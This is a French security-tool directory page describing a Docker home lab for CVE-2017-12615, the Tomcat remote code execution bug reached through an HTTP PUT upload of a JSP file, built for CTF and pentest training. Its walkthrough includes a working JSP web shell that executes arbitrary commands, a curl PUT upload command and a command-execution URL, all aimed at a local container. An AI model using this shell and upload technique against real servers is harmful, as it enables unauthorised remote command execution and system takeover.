Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat : Exécution de code à distance via l'upload JSP — Home Lab pour le Red Teaming, les tests d'intrusion | Kitploit
Outils/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique
GitHubnetw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat : Exécution de code à distance via l'upload JSP — Home Lab pour le Red Teaming, les tests d'intrusion

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ANGLAIS CI-DESSOUS

CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload

image

Ce lab simule la vulnérabilité CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload
Elle est causée par la configuration readonly=false, qui permet de téléverser des fichiers via HTTP PUT, y compris des fichiers .jsp capables d'exécuter des commandes (RCE).


image

Fonctionnalités

  • Apache Tomcat 7.0.79 (vulnérable)
  • Override de DefaultServlet avec readonly=false
  • Téléversement PUT pour placer des fichiers .jsp dans le répertoire web ROOT
  • Prise en charge de l'exécution de commandes via un web shell
  • Page web de style industriel avec une note interne oubliée (indice)
  • Génération automatique de flag_RANDOM.txt à chaque démarrage du conteneur
  • Conçu pour les CTF / Red Team / formation au pentest

Structure des répertoires

root@kitploit:~
/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

Utilisation (Lancer le conteneur)

root@kitploit:~
docker compose build
docker compose up -d

Ouvrir le site :

root@kitploit:~
http://localhost:8080/

Comment tester la vulnérabilité CVE-2017-12615

1) Créer le fichier payload JSP

root@kitploit:~
cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) Téléverser le fichier avec PUT (le nom du fichier doit se terminer par /)

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) Utiliser le webshell

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

Flag

Stocké dans :

root@kitploit:~
/tmp/flag_RANDOM.txt

Version anglaise — CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload

Ce lab simule CVE-2017-12615 Tomcat: Remote Code Execution via JSP Upload, où le DefaultServlet d'Apache Tomcat est mal configuré avec :

root@kitploit:~
readonly=false

Cela permet aux attaquants de téléverser des fichiers .jsp via HTTP PUT, permettant ainsi une exécution de code à distance.


image

Fonctionnalités

  • Apache Tomcat 7.0.79 vulnérable
  • Override de DefaultServlet avec readonly=false
  • Téléversement PUT → écriture de fichiers .jsp arbitraires dans le répertoire web ROOT
  • Prend en charge l'exécution de commandes via un shell JSP
  • Page d'accueil de style industriel avec un indice interne subtil
  • flag_RANDOM.txt généré automatiquement au démarrage du conteneur
  • Adapté aux CTF, à la recherche et au développement d'exploits

Exemple d'exploitation

Téléverser un shell JSP

root@kitploit:~
curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

Exécuter des commandes

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id

Emplacement du flag

root@kitploit:~
/tmp/flag_RANDOM.txt

Avertissement

À des fins éducatives, de recherche et de tests d'intrusion autorisés uniquement.

Télécharger l’outil